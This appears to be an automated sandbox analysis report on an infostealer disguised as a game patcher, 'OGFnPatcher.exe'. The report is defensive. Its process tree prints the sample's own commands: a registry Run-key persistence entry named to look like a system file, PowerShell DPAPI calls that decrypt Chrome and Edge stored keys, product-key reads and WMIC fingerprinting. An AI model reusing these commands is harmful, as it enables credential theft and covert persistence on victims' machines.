Resubmissions

21-09-2024 11:34

240921-nprd1azend 10

Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21-09-2024 11:34

General

  • Target

    OGFnPatcher.exe

  • Size

    177.3MB

  • MD5

    82db6baf5501b11cf7582d68cb173689

  • SHA1

    ff40fcae2ecfb00eb3f1a36521afbdc93db1e6e6

  • SHA256

    17f48d532943a1160b9c171e183599d28b3a03b4943df8d1b5f8af2aaed142fc

  • SHA512

    9d47fc31fec0379b7ec6461401e5cda54f7b64d6ff0a30136e5ad58bb94446cfa6f1e511380eb5bf99f59174e56fdc7a7cd06cf7cf46898c672bf37c36ec4d82

  • SSDEEP

    1572864:s+vbimZ3RqPfrrW/GDt+wy2tXgJdtEaxMz6lMp1rJ/Gk/QeF/anRq9A4CGdhVnau:sA5kyGScXQT

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
    "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe"
    1⤵
    • Checks computer location settings
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3828
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3260
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4704
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size | more +1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic logicaldisk get size
        3⤵
        • Collects information from the system
        • Suspicious use of AdjustPrivilegeToken
        PID:2032
      • C:\Windows\system32\more.com
        more +1
        3⤵
        PID:4540
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      2⤵
      PID:4924
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic csproduct get uuid
        3⤵
        PID:100
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4312
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic OS get caption, osarchitecture
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1108
      • C:\Windows\system32\more.com
        more +1
        3⤵
        PID:3772
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1864
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic cpu get name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:228
      • C:\Windows\system32\more.com
        more +1
        3⤵
        PID:2084
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1260
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic PATH Win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:320
      • C:\Windows\system32\more.com
        more +1
        3⤵
        PID:1748
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      2⤵
      PID:1448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3268
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      2⤵
      PID:1152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:548
    • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
      "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2164,i,6884902397894312204,5445439030798024804,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
      2⤵
      PID:4480
    • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
      "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --field-trial-handle=2388,i,6884902397894312204,5445439030798024804,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2372 /prefetch:3
      2⤵
      PID:3416
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3828 get ExecutablePath"
      2⤵
      PID:3256
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic process where processid=3828 get ExecutablePath
        3⤵
        PID:4708
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v System32Kernal /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe -silent" /f"
      2⤵
      PID:3984
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v System32Kernal /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe -silent" /f
        3⤵
        • Adds Run key to start application
        PID:1796
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      2⤵
      PID:4532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3248
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      PID:2716
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        PID:4344
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      PID:4496
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        PID:888
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,94,118,215,86,104,36,190,210,191,158,213,118,69,65,171,77,134,208,103,139,123,215,32,203,243,251,121,135,219,58,98,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,217,107,72,193,90,9,71,240,156,102,155,85,167,17,230,124,188,26,17,11,83,181,231,73,17,24,66,153,246,3,30,213,48,0,0,0,15,49,109,31,45,121,15,98,19,6,96,233,179,52,141,22,48,238,204,202,154,156,95,146,132,221,232,177,191,178,133,7,62,137,116,50,1,225,8,21,127,52,216,165,130,3,213,65,64,0,0,0,0,162,28,187,117,113,235,27,148,77,112,253,157,81,53,20,64,111,73,197,84,131,170,187,105,129,6,90,31,5,83,187,142,34,81,198,165,62,205,34,247,140,67,78,230,75,221,57,211,121,140,116,127,134,133,186,114,166,150,59,86,213,217,158), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2944
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,94,118,215,86,104,36,190,210,191,158,213,118,69,65,171,77,134,208,103,139,123,215,32,203,243,251,121,135,219,58,98,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,217,107,72,193,90,9,71,240,156,102,155,85,167,17,230,124,188,26,17,11,83,181,231,73,17,24,66,153,246,3,30,213,48,0,0,0,15,49,109,31,45,121,15,98,19,6,96,233,179,52,141,22,48,238,204,202,154,156,95,146,132,221,232,177,191,178,133,7,62,137,116,50,1,225,8,21,127,52,216,165,130,3,213,65,64,0,0,0,0,162,28,187,117,113,235,27,148,77,112,253,157,81,53,20,64,111,73,197,84,131,170,187,105,129,6,90,31,5,83,187,142,34,81,198,165,62,205,34,247,140,67,78,230,75,221,57,211,121,140,116,127,134,133,186,114,166,150,59,86,213,217,158), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3928
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,121,162,92,254,76,172,230,174,98,220,161,66,174,166,47,68,200,13,123,128,152,149,208,91,195,234,47,255,249,175,0,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,23,48,245,211,211,228,234,160,218,22,107,134,175,243,65,105,168,182,29,205,235,76,179,178,192,87,255,168,160,6,154,48,0,0,0,211,70,245,94,52,97,38,12,76,52,209,104,240,43,55,96,112,117,226,94,35,26,42,105,44,26,156,248,58,145,131,96,94,67,203,96,14,245,233,144,23,209,209,14,202,112,51,222,64,0,0,0,68,74,159,117,33,69,56,22,210,23,222,252,199,47,128,62,9,191,159,208,97,231,84,22,70,123,16,192,250,122,23,221,132,161,232,25,62,228,100,1,64,199,113,18,19,130,239,242,160,166,49,2,166,90,122,197,119,180,219,215,197,185,125,13), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,121,162,92,254,76,172,230,174,98,220,161,66,174,166,47,68,200,13,123,128,152,149,208,91,195,234,47,255,249,175,0,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,23,48,245,211,211,228,234,160,218,22,107,134,175,243,65,105,168,182,29,205,235,76,179,178,192,87,255,168,160,6,154,48,0,0,0,211,70,245,94,52,97,38,12,76,52,209,104,240,43,55,96,112,117,226,94,35,26,42,105,44,26,156,248,58,145,131,96,94,67,203,96,14,245,233,144,23,209,209,14,202,112,51,222,64,0,0,0,68,74,159,117,33,69,56,22,210,23,222,252,199,47,128,62,9,191,159,208,97,231,84,22,70,123,16,192,250,122,23,221,132,161,232,25,62,228,100,1,64,199,113,18,19,130,239,242,160,166,49,2,166,90,122,197,119,180,219,215,197,185,125,13), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4560
    • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
      "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --gpu-preferences=UAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1388,i,6884902397894312204,5445439030798024804,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1504

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Browsers\Passwords.txt
    Filesize: 19B
    MD5: c4efd9a7b61ebf43b608440be5e33369
    SHA1: 926418256c277f1b11b575ec6e92ce6a844612f7
    SHA256: ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f
    SHA512: 9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\ApproveTest.pdf
    Filesize: 896KB
    MD5: 2796634e7582fd3b91eaf3ac09a79dd1
    SHA1: 35a73fa55e81832cad3aafd472a282e6729c2737
    SHA256: c83e57aedf946aa1973dcf063571119d7ab7d4fa9f60a7789f603e86778a6713
    SHA512: 33609100739e5482d7cf1c7cd89e11bb884855e3223c0be0838d6ac48dc85199b83056748cac521236c5814e8cf755e1847896e3d2f349c54ca14fe9f44d0288

  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\CompleteSelect.docx
    Filesize: 14KB
    MD5: 3c824a1eb1e8736ec72dab988264e104
    SHA1: 77c0b7e07b221d15ac235aad66b4a38d7ba8a25f
    SHA256: 315f6d1363844799086a9f9ddaae1e63dd2caeb511d94c71a7cd7fd52fcd4f2f
    SHA512: 4c3f550b92bef16fccc396870604df647cf3ccf6c4744ab1ec94b323f65cbdc53e839407b1f6b8d82cea155fd9fa1e66491942666390a1ea88614fbafcab0d70

  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\ExportUnblock.docx
    Filesize: 618KB
    MD5: 61ded64fb04a39d0b43c2f4f39fdf5fe
    SHA1: 15ae034c23b867b3fc1c4fda3f86a9490360359a
    SHA256: 9c05aaf53bfd0a4700413415cd95f87a83de77621d603a5a3512f47caf007a4f
    SHA512: b890adc60c5adc9075d046269fa020d37cb6302478b11af516d96ec84950942413c2040319addc463b5929fe892a20cfb177f9b44ccb191c96cc3379f2e2e98e

  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\PingAssert.doc
    Filesize: 472KB
    MD5: b5f8e98d1c1890344b653f661a65bd75
    SHA1: b21a7ca7bb521b526f2ff5b8e5409bf997f7db96
    SHA256: eaa4c88d96f05a2d61392461e484824d2a7c7592e58428ef7fead0e1b8b42e49
    SHA512: bba429b788e4bd4cbdb07de905b857eeeee5daa8fddd8c42d7ae60cec2c49429baa718ab477064d4b0df0c3b9d02588e403758544d50db427148eca9028044f0

  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\SetExport.odt
    Filesize: 211KB
    MD5: a6f1e0be2f70cc5277cf539d73231f64
    SHA1: 14fea6c6ff7b064e594b2f4253be4c20771dad94
    SHA256: 5fb0d0062e924c0d0dafaec3e6a36d574d092d5d9ad73fe748573eb7807a5728
    SHA512: 8e36cc5d8e20108a8f02e8a159c178cc7017ca7ea0de0370012b0a96e86a25f3055c7f1cf437d5262cda93a9c4f40d9646ba8cc834d5b1b35bd85fc6a92fccf8

  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\SkipReceive.docx
    Filesize: 16KB
    MD5: f5475cc1da5492f5913fa4bbefee40ae
    SHA1: 9d5157eb20e979a4f4d95a7d9ea6870fbbfa56bb
    SHA256: 2643edae07432f9d985968c4a7652a356f6007625c15db551c7c4dd481d60faa
    SHA512: aaca128eb70b3aedab0b6ed718a237c8f4a0238dc11a6be4a9aace260e23c7693e8d01bf3f8962becae6ec9fa035b98e027d12da4d81b3f78cafd40b83970195

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 6cf293cb4d80be23433eecf74ddb5503
    SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
    SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
    SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 64B
    MD5: 5caad758326454b5788ec35315c4c304
    SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
    SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
    SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 64B
    MD5: 446dd1cf97eaba21cf14d03aebc79f27
    SHA1: 36e4cc7367e0c7b40f4a8ace272941ea46373799
    SHA256: a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
    SHA512: a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 8e26941f21dac5843c6d170e536afccb
    SHA1: 26b9ebd7bf3ed13bc51874ba06151850a0dac7db
    SHA256: 316f6ce22306f3018f9f57435ea75092633097182646f7e4ca23e2e2aa1393c0
    SHA512: 9148227032d98d49baf0d81a7435ba3adc653d7790245140acc50c38de00839d26a661b92f6754b15bab54fe81fbcf9003692fd7bef09027f11ef703a5879e62

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bcslh5jg.3s2.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/548-12-0x000002EEE6400000-0x000002EEE6422000-memory.dmp
    Filesize: 136KB

  • memory/1504-144-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-138-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-140-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-139-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-145-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-150-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-149-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-148-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-147-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/1504-146-0x0000028371790000-0x0000028371791000-memory.dmp
    Filesize: 4KB

  • memory/3928-64-0x0000022E6F200000-0x0000022E6F250000-memory.dmp
    Filesize: 320KB